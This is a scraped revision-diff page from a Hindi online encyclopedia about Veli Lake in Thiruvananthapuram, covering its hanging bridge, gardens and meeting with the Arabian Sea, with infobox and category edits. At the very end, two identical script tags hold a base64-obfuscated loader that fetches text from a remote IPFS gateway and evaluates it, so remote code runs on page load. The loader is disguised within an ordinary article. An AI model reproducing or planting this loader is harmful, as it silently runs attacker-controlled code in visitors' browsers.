Difference between revisions of "वेली झील तिरुअनंतपुरम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "नजर" to "नज़र")
 
(6 intermediate revisions by 5 users not shown)
Line 1: Line 1:
{{लेख सूची
+
{{सूचना बक्सा झील
|लेख का नाम= तिरुअनंतपुरम
+
|चित्र=Vali-Lake-Thiruvananthapuram.jpg
|पर्यटन= तिरुअनंतपुरम पर्यटन
+
|चित्र का नाम=वेली झील
|ज़िला= तिरुअनंतपुरम ज़िला
+
|नाम=वेली झील, तिरुअनंतपुरम
 +
|प्रकार=प्राकृतिक
 +
|देश=[[भारत]]
 +
|राज्य=[[केरल]]
 +
|नगर=[[तिरुअनंतपुरम]]
 +
|निर्देशांक=
 +
|अधिकतम लंबाई=
 +
|अधिकतम गहराई=
 +
|अधिकतम चौड़ाई=
 +
|सतह की ऊँचाई=
 +
|क्षेत्रफल=
 +
|जल क्षमता=
 +
|जल का ठहराव समय=
 +
|गूगल मानचित्र=[https://www.google.co.in/maps/dir/Thiruvananthapuram,+Kerala/Veli+Lake+and+Tourist+Village,+Veli+Sanghumugham+Road,+Veli,+Thiruvananthapuram,+Kerala+695021/@8.5184382,76.8951221,14z/data=!3m1!4b1!4m14!4m13!1m5!1m1!1s0x3b05bbb805bbcd47:0x15439fab5c5c81cb!2m2!1d76.9366376!2d8.5241391!1m5!1m1!1s0x3b05bc3b8bcd7c63:0xf2a956af86a27253!2m2!1d76.8886702!2d8.5080206!3e0 वेली झील]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=वेली झील पर एक 'हैंगिंग ब्रिज' बना हुआ है, जिसे पार करते हुए एक अलग ही आनंद आता है। यहाँ सागरतट के पास वेली झील और [[अरब सागर]] का संगम भी दिखाई देता है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 
}}
 
}}
*[[केरल]] की राजधानी [[तिरुअनंतपुरम]] में कई [[तिरुअनंतपुरम पर्यटन|पर्यटन स्थल]] हैं जिनमें से एक वेली झील हैं।
+
'''वेली झील''' [[केरल]] की राजधानी [[तिरुअनंतपुरम]] में स्थित है। हरे-भरे वृक्षों से घिरी झील की सुंदरता हर दिशा से अलग नज़र आती है।  
*हरे-भरे वृक्षों से घिरी झील की सुंदरता हर दिशा से अलग नज़र आती है।  
 
 
*यहाँ सागरतट के पास वेली झील और [[अरब सागर]] का संगम भी दिखाई देता है।  
 
*यहाँ सागरतट के पास वेली झील और [[अरब सागर]] का संगम भी दिखाई देता है।  
 
*झील के पास विशाल उद्यान में कुछ झूले भी हैं।  
 
*झील के पास विशाल उद्यान में कुछ झूले भी हैं।  
Line 11: Line 30:
 
*झील पर एक 'हैंगिंग ब्रिज' बना हुआ है, जिसे पार करते हुए एक अलग ही आनंद आता है।  
 
*झील पर एक 'हैंगिंग ब्रिज' बना हुआ है, जिसे पार करते हुए एक अलग ही आनंद आता है।  
 
*कुछ आगे निकल जाएँ तो सागरतट नज़र आता है। लेकिन पर्यटक सागरतट की ओर, [[वेली टूरिस्ट विलेज तिरुअनंतपुरम|वेली टूरिस्ट विलेज]] के आकर्षण को छोड़ बहुत कम जाते हैं।  
 
*कुछ आगे निकल जाएँ तो सागरतट नज़र आता है। लेकिन पर्यटक सागरतट की ओर, [[वेली टूरिस्ट विलेज तिरुअनंतपुरम|वेली टूरिस्ट विलेज]] के आकर्षण को छोड़ बहुत कम जाते हैं।  
{{लेख प्रगति
+
 
|आधार=आधार1
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{केरल के पर्यटन स्थल}}
+
{{केरल की झीलें}}{{भारत की झीलें}}{{केरल के पर्यटन स्थल}}
[[Category:केरल]]
+
[[Category:केरल]][[Category:केरल के पर्यटन स्थल]][[Category:केरल की झीलें]][[Category:तिरुअनंतपुरम]][[Category:पर्यटन कोश]][[Category:भारत की झीलें]]
[[Category:केरल के पर्यटन स्थल]]
 
[[Category:तिरुअनंतपुरम]]
 
[[Category:पर्यटन कोश]]
 
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 11:24, 12 August 2016

veli jhil tiruanantapuram
nam veli jhil, tiruanantapuram
prakar prakritik
desh bharat
rajy keral
nagar/zila tiruanantapuram
googal manachitr veli jhil
any janakari veli jhil par ek 'haiangiang brij' bana hua hai, jise par karate hue ek alag hi anand ata hai. yahaan sagaratat ke pas veli jhil aur arab sagar ka sangam bhi dikhaee deta hai.

veli jhil keral ki rajadhani tiruanantapuram mean sthit hai. hare-bhare vrikshoan se ghiri jhil ki suandarata har disha se alag nazar ati hai.

  • yahaan sagaratat ke pas veli jhil aur arab sagar ka sangam bhi dikhaee deta hai.
  • jhil ke pas vishal udyan mean kuchh jhoole bhi haian.
  • yahaan bani kuchh adhunik moortiyaan bhi paryatakoan ko achchhi lagati haian.
  • jhil par ek 'haiangiang brij' bana hua hai, jise par karate hue ek alag hi anand ata hai.
  • kuchh age nikal jaean to sagaratat nazar ata hai. lekin paryatak sagaratat ki or, veli toorist vilej ke akarshan ko chho d bahut kam jate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>